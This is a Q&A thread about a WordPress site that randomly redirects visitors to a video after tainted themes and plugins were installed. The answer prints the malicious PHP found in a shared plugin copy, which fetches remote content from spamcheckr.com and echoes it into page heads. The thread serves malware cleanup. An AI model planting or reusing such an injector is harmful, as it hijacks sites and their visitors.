# Wordpress site linking to Spamcheckr video

Tags: wordpress, security, woocommerce

I have found a few posts on here about wordpress sites being infected with a Spamcheckr code and linking off to a video - there is a case here - [WordPress blog infected with HTML Refresh meta tag](https://stackoverflow.com/questions/22923521/wordpress-blog-infected-with-html-refresh-meta-tag)

I have the same thing but mine was in my theme in a file called settings_class.php

I have removed the settings_class.php file as it was mostly commented out, and found it was being linked to in my themes functions.php file. So i deleted this line, and still have the problem.

I have deleted my cache and searched my website for Spamcheck and now there is no links, yet it is still linking to this Justin B video here - http:// www.youtube.com/watch?v=RFngSCaY5nA

It is random but if for me it happens when I visit this page - http://www.ginirigs.net/product/15mm-rail-clamp/

Please please let me know if you can help.

Comment: have you checked for changes in the code?

Comment: Sorry Liam I am not sure what you mean?

Comment: it looks like your website has been hacked. check for any recently modified pages and check that there is nothing unusual about the code or anything that wasn't there originally

Comment: Thanks Liam. I appreciate your help but this is not as simple as being hacked. This is installing 3rd party plugins/themes that have the code injected into it already. I do believe I may have found the solution for anyone in the same position. I manually deleted all the cache in wp-content/cache/supercache after doing the fix above. Hopefully this helps someone in the same place and I just hope this fixed it.

Comment: No I have read the following and it looks like an exploit that has been found in one of the plugins, however i have also ready that the cache/supercache may temporarily get rid of it but have you tried searching in "classes/class-settings.php" which should be included into one of the plugins/themes causing this issue. just search for the link that is showing the video. Have a look here http://wordpress.org/support/topic/httpadwatch-advert-keeps-appearing

Answer (score 0):

Had the same problem on my site, found it in includes/settings.php inside a copy of GravityForms 1.8.4 a friend sent me. For those new to FileSeek changing some of the advanced settings helped me for a successful search.
"Match query to entire file", "Search sub-folders" checked, "Process file contents using File Handlers" checked, and "Show file names that match the query text" checked. Everything else on the Adv tab was turned off. Had my result almost immediately after searching an entire folder of plugins and themes.

Here's the code I found, same as on the aforementioned link (expanded from a single line format for readability).

```
<?php
  if (!isset($_COOKIE['wordpress_test_cookie'])){
    if (mt_rand(1,20) == 1) {
      function secqc2_cahesk(){
        if(function_exists('curl_init')){
          $addressd = "http://spamcheckr.com/l.php";
          $ch = curl_init();
          $timeout = 5;
          url_setopt($ch,CURLOPT_URL,$addressd);
          curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
          curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
          $data = curl_exec($ch);
          curl_close($ch);
          echo "$data";
        }
      }
      add_action('wp_head','secqc2_cahesk');
    }
  }
?>
```